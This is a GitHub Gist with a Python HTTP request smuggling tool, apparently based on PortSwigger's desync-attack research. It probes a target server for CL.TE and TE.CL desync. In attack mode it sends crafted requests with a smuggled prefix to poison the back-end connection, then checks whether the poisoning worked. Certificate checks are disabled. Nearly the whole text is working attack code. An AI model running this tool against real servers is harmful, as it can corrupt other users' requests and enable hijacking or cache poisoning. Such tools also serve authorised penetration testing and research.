Last active
August 14, 2019 20:15
-
-
Save sudoaza/afedf0483e208df8d57b01598012dfff to your computer and use it in GitHub Desktop.
HTTP Smuggler based on https://portswigger.net/blog/http-desync-attacks-request-smuggling-reborn
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import socket | |
import sys | |
import ssl | |
import argparse | |
from pwn import enhex | |
import time | |
def error(msg):
    """Write a debug message to standard error when debugging is enabled.

    The message is dropped silently unless the module-level ``args.debug``
    value is truthy.

    Args:
        msg: Text to emit.
    """
    if not args.debug:
        return
    # ``file=`` is required here: passed positionally, sys.stderr would just be
    # printed to stdout as a second value next to the message.
    print(msg, file=sys.stderr)
def clte_detect(host, port=80, chunked_header="Transfer-Encoding: chunked"):
    """Send the "izq" probe to *host* and report whether it was accepted.

    Args:
        host: Target host name, also used for the Host header.
        port: Target TCP port.
        chunked_header: Raw Transfer-Encoding header line to include.

    Returns:
        True when the response contains neither "400 Bad Request" nor the
        "SMG_TIMEOUT" marker, False otherwise.
    """
    print("\nRunning CLTE Detection\n======================\n")
    probe = build_request(host, chunked_header, mode="izq")
    reply = request(host, port, probe)
    # NOTE(review): the PortSwigger write-up this tool is based on appears to
    # treat a timeout on this probe as the CL.TE indicator, whereas a timeout
    # yields False here -- confirm the intended interpretation.
    for marker in ("400 Bad Request", "SMG_TIMEOUT"):
        if marker in reply:
            return False
    return True
def tecl_detect(host, port=80, chunked_header="Transfer-Encoding: chunked"):
    """Send the "oxo" probe to *host* and report whether the exchange timed out.

    Args:
        host: Target host name, also used for the Host header.
        port: Target TCP port.
        chunked_header: Raw Transfer-Encoding header line to include.

    Returns:
        True when the response text carries the "SMG_TIMEOUT" marker.
    """
    print("\nRunning TECL Detection\n======================\n\n")
    reply = request(host, port, build_request(host, chunked_header, mode="oxo"))
    return "SMG_TIMEOUT" in reply
def build_request(host, chunked_header, main_body="", smuggled_body="", mode="izq"):
    """Assemble the raw HTTP/1.1 request text for the given smuggling mode.

    The request line is taken from the module-level ``args.http_method`` and
    ``args.file``. All lengths are counted in UTF-8 octets, because the
    message is UTF-8 encoded before it is written to the socket.

    Args:
        host: Value of the Host header.
        chunked_header: Full Transfer-Encoding header line; the header is
            omitted when this is empty.
        main_body: Body of the outer request (used by "clte" only; "tecl",
            "izq" and "oxo" replace it).
        smuggled_body: Data appended after the outer body.
        mode: One of "clte", "tecl", "izq" or "oxo". Any other value leaves
            the bodies untouched and declares a Content-Length of 0.

    Returns:
        The complete request as a ``str``.
    """

    def octets(text):
        # Number of bytes *text* occupies on the wire.
        return len(text.encode("utf-8"))

    content_len = 0
    if mode == "clte":
        if main_body:
            # Prefix the body with its chunk size (hex, no "0x").
            main_body = f"{octets(main_body):x}\r\n{main_body}"
        main_body += "\r\n0\r\n\r\n"
        # NOTE(review): the declared length is two octets short of the real
        # body; kept as in the original -- confirm this is intentional.
        content_len = octets(main_body + smuggled_body) - 2
    elif mode == "tecl":
        chunk_len = f"{octets(smuggled_body):x}"
        if smuggled_body:
            smuggled_body += "\r\n0\r\n\r\n"
        # Content-Length covers only the chunk-size line and its CRLF.
        content_len = len(chunk_len) + 2
        main_body = chunk_len + "\r\n"
    elif mode == "izq":
        content_len = 4
        main_body = "1\r\nZ\r\nQ\r\n"
    elif mode == "oxo":
        content_len = 6
        main_body = "0\r\n\r\nX\r\n"

    parts = [
        f"{args.http_method} {args.file} HTTP/1.1\r\n",
        f"Host: {host}\r\nAccept: */*\r\n",
    ]
    if chunked_header:
        parts.append(f"{chunked_header}\r\n")
    parts.append(f"Content-Length: {content_len}\r\n")
    parts.append("\r\n")
    parts.append(main_body + smuggled_body)
    return "".join(parts)
def request(host, port, message):
    """Send *message* to ``host:port`` on a fresh connection and return the reply.

    The request and the response are echoed to stdout. Reading stops when the
    peer closes the connection, when the bytes ``0\\r\\n\\r\\n`` have been seen
    in the accumulated response, or when the socket times out.

    Args:
        host: Host name or address to connect to.
        port: TCP port; port 443 is wrapped in TLS with certificate and
            hostname verification disabled.
        message: Raw request text; it is UTF-8 encoded before sending.

    Returns:
        The response decoded as UTF-8 (undecodable bytes are replaced). If the
        socket timed out, whatever was received so far prefixed with
        ``"SMG_TIMEOUT\\r\\n"``.
    """
    print("# REQUEST >\n" + message + "\n")

    # Create a TCP/IP socket
    sock = socket.socket(socket.AF_INET)
    try:
        if port == 443:
            context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            context.verify_mode = ssl.CERT_NONE
            context.check_hostname = False
            sock = context.wrap_socket(sock, server_hostname=host)

        # Connect the socket to the port where the server is listening
        sock.connect((host, port))
        sock.settimeout(3.0)

        response = b""
        try:
            error('sending "%s"' % message)
            sock.sendall(str.encode(message))
            while True:
                data = sock.recv(1024)
                response += data
                if len(data) == 0 or b"0\r\n\r\n" in response:
                    break
                error('received "%s"' % data)
        except socket.timeout:  # no activity within the 3 second timeout
            # Responses may carry arbitrary bytes; never let decoding abort.
            text = "SMG_TIMEOUT\r\n" + response.decode("utf-8", errors="replace")
            print("< RESPONSE #\n" + text + "\n")
            return text

        text = response.decode("utf-8", errors="replace")
        # Long responses are shortened to head and tail while args.full is truthy.
        if len(text) > 4000 and args.full:
            print("< RESPONSE #\n" + f"length: {len(text)}\n" + text[:4000] + "\n\n...\n\n" + text[-1000:] + "\n")
        else:
            print("< RESPONSE #\n" + f"length: {len(text)}\n" + text + "\n")
        return text
    finally:
        # Runs on every path, including a failed TLS wrap or connect, so the
        # socket is never leaked.
        error('closing socket')
        sock.close()
def recon(chunked_header):
    """Run the detection probes against the configured target and print a verdict.

    The CLTE probe runs first; the TECL probe runs only if the first one
    returns a falsy result. The target comes from the module-level
    ``target_host`` and ``target_port``.

    Args:
        chunked_header: Raw Transfer-Encoding header line passed to each probe.
    """
    probes = (
        ("CLTE Detected", clte_detect),
        ("TECL Detected", tecl_detect),
    )
    for verdict, probe in probes:
        if probe(target_host, target_port, chunked_header):
            print(verdict)
            return
    print("Not Vulnerable")
def attack(chunked_header, contraband, mode):
    """Build one smuggling request for the configured target and send it.

    The outer body comes from the module-level ``body``; the target comes from
    ``target_host`` and ``target_port``. The response is printed by
    ``request`` and otherwise discarded.

    Args:
        chunked_header: Raw Transfer-Encoding header line (may be empty).
        contraband: Data placed after the outer body.
        mode: Request layout passed through to ``build_request``.
    """
    print("\nAttacking\n======================\n\n")
    payload = build_request(target_host, chunked_header, body, contraband, mode)
    request(target_host, target_port, payload)
# Command-line interface: parse the options, publish them as module-level
# globals used by the functions above, then run either the attack or recon.
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--domain', help='Domain', required=True)
# type=int makes argparse reject a non-numeric port with a usage error.
parser.add_argument('-p', '--port', help='Port', required=False, type=int, default=80)
# nargs='?' lets -D act as a bare switch while still accepting "-D <value>".
parser.add_argument('-D', '--debug', help='Debug', required=False, nargs='?', const=True, default=False)
# store_false: args.full is True by default and becomes False when --full is
# given; request() shortens long responses only while it is True.
parser.add_argument('--full', help='Show full answer', required=False, action="store_false")
parser.add_argument('-r', '--recon', help='Check if server is vulnerable', required=False, action='store_true', default=True)
parser.add_argument('-a', '--attack', help='Poison buffer', required=False, action='store_true')
parser.add_argument('-e', '--transfer-encoding', help='Transfer Encoding header', required=False, default="Transfer-Encoding: chunked")
parser.add_argument('-c', '--contraband', help='Payload to prepend to next request', required=False, default="GET /404 HTTP/1.1\r\nFoo: b")
parser.add_argument('-m', '--mode', help='clte or tecl. Content Length in front Treansfer Encoding in back (clte).', required=False, default="clte")
parser.add_argument('-b', '--body', help='Request body', required=False, default="=x&q=smuggling&x=")
parser.add_argument('-x', '--http-method', help='Request method', required=False, default="POST")
parser.add_argument('-f', '--file', help='Request path', required=False, default="/")
args = parser.parse_args()

target_host = args.domain
target_port = int(args.port)
# Turn backslash escapes typed on the command line into real control characters.
chunked_header = args.transfer_encoding.replace("\\n", "\n").replace("\\r", "\r").replace("\\t", "\t")
contraband = args.contraband.replace("\\r\\n", "\r\n")
mode = args.mode
body = args.body

if args.attack:
    attack(chunked_header, contraband, mode)
    # Check attack worked, we should get the poisoned response
    attack("", "", mode)
else:
    # --recon defaults to True, so recon is what runs whenever --attack is
    # absent; the flag itself is kept only for command-line compatibility.
    recon(chunked_header)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment